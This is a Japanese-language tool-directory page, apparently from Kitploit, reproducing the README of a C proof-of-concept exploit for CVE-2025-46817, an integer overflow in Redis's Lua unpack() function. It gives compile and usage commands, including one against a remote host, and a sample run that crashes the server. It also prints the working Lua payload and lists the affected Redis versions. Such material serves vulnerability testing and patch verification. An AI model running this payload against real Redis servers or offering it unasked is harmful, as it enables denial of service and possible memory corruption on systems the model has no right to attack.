Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/slayerkkkk/cve-2025-46817-poc
脆弱性分析エクスプロイトファジングペネトレーションテストデータベースセキュリティ
GitHubslayerkkkk/cve-2025-46817-poc

CVE-2025-46817-PoC

CVE-2025-46817 用の C ベースのエクスプロイト。Redis の整数オーバーフロー脆弱性を利用し、クラッシュ検出と Lua の unpack() ペイロードによる潜在的な RCE を可能にします。

リポジトリを見る
2810ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-46817 Redis 整数オーバーフローエクスプロイト

Banner Language Platform

Redis 整数オーバーフロー脆弱性に対する CVE-2025-46817 エクスプロイトの軽量 C 実装です。

🚀 特徴

  • 軽量: 単一の C ファイル、hiredis 以外の外部依存関係なし
  • 高速: 最大パフォーマンスのためのネイティブコンパイル
  • カラフルな出力: 美しいターミナルカラーとアイコン
  • クラッシュ検出: サーバークラッシュを自動検出
  • バージョン確認: 脆弱な Redis バージョンを識別
  • タイムアウトサポート: 接続タイムアウトを設定可能

📋 必要条件

Ubuntu/Debian

root@kitploit:~
sudo apt-get update
sudo apt-get install build-essential libhiredis-dev

CentOS/RHEL

root@kitploit:~
sudo yum install gcc hiredis-devel

macOS

root@kitploit:~
brew install hiredis

🔧 コンパイル

root@kitploit:~
gcc -o exploit exploit.c -lhiredis

🎯 使用方法

基本的な使用方法

root@kitploit:~
./exploit -H 127.0.0.1 -P 6379

リモートターゲット

root@kitploit:~
./exploit -H 192.168.1.100 -P 6379 -t 5

コマンドラインオプション

root@kitploit:~
-H <host>    Redis サーバーホスト(必須)
-P <port>    Redis サーバーポート(必須)  
-t <timeout> 接続タイムアウト(秒)(デフォルト: 10)
-h           ヘルプメッセージを表示

📊 出力例

root@kitploit:~
 ██▓███   █     █░███▄    █  ▄▄▄▄    █    ██   █████▒ █████▒▓█████  ██▀███  
▓██░  ██▒▓█░ █ ░█░██ ▀█   █ ▓█████▄  ██  ▓██▒▓██   ▒▓██   ▒ ▓█   ▀ ▓██ ▒ ██▒
▓██░ ██▓▒▒█░ █ ░█▓██  ▀█ ██▒▒██▒ ▄██▓██  ▒██░▒████ ░▒████ ░ ▒███   ▓██ ░▄█ ▒
▒██▄█▓▒ ▒░█░ █ ░█▓██▒  ▐▌██▒▒██░█▀  ▓▓█  ░██░░▓█▒  ░░▓█▒  ░ ▒▓█  ▄ ▒██▀▀█▄  
▒██▒ ░  ░░░██▒██▓▒██░   ▓██░░▓█  ▀█▓▒▒█████▓ ░▒█░   ░▒█░    ░▒████▒░██▓ ▒██▒
▒▓▒░ ░  ░░ ▓░▒ ▒ ░ ▒░   ▒ ▒ ░▒▓███▀▒░▒▓▒ ▒ ▒  ▒ ░    ▒ ░    ░░ ▒░ ░░ ▒▓ ░▒▓░
░▒ ░       ▒ ░ ░ ░ ░░   ░ ▒░▒░▒   ░ ░░▒░ ░ ░  ░      ░       ░ ░  ░  ░▒ ░ ▒░
░░         ░   ░    ░   ░ ░  ░    ░  ░░░ ░ ░  ░ ░    ░ ░       ░     ░░   ░ 
             ░            ░  ░         ░                       ░  ░   ░     
                                  ░                                         
                    CVE-2025-46817 Exploit Tool
                   Integer Overflow -> RCE Chain
                   Access -> https://pwnbuffer.org/

    Author: Slayerkkk
    Target: Redis <= 8.2.1
    Type: Memory Corruption -> Code Execution

ℹ️ 127.0.0.1:6379 への接続をテスト中...
✅ 接続成功
ℹ️ Redis バージョン: 8.2.1
❌ 脆弱 - バージョン <= 8.2.1
ℹ️ Lua スクリプティングをテスト中...
✅ Lua 有効(1+1=2)

🚀 エクスプロイト開始
==================================================
💀 エクスプロイトペイロードを実行中...
    Payload: unpack() による整数オーバーフロー
💥 サーバーがクラッシュ - 接続が切断されました!

📊 エクスプロイト結果
==============================
  💥 ステータス: crashed (2.34s)

💀 エクスプロイト成功 - サーバーがクラッシュしました!
   CVE-2025-46817 脆弱性が確認されました

🛡️ 影響を受けるバージョン

  • Redis <= 8.2.1
  • Redis <= 8.0.3
  • Redis <= 7.4.5
  • Redis <= 7.2.10
  • Redis <= 6.2.19

🔍 技術的詳細

脆弱性

このエクスプロイトは、Redis の Lua unpack() 関数の実装(luaB_unpack)における整数オーバーフローを標的としています。特定のパラメータで呼び出されると、符号付き整数演算がオーバーフローし、Redis が膨大な数の戻り値の実体化を試みます。

エクスプロイトペイロード

root@kitploit:~
local data = {1, 2, 3}
return {unpack(data, -2147483648, 2147483647)}

影響

  • サーバークラッシュ: 即時のサービス拒否
  • メモリ破壊: ヒープ/スタックの破壊
  • 潜在的な RCE: メモリ破壊がコード実行につながる可能性

🎯 検出結果

このツールは以下のステータスのいずれかを報告します:

  • ✅ survived: サーバーがペイロードを処理(おそらくパッチ適用済み)
  • 💥 crashed: サーバーがクラッシュ(脆弱)
  • ⚠️ timeout: サーバーがハング(おそらく脆弱)
  • ❌ error: その他のエラーが発生

🙏 クレジット

作者: Slayerkkk
ウェブサイト: https://pwnbuffer.org

ツールをダウンロード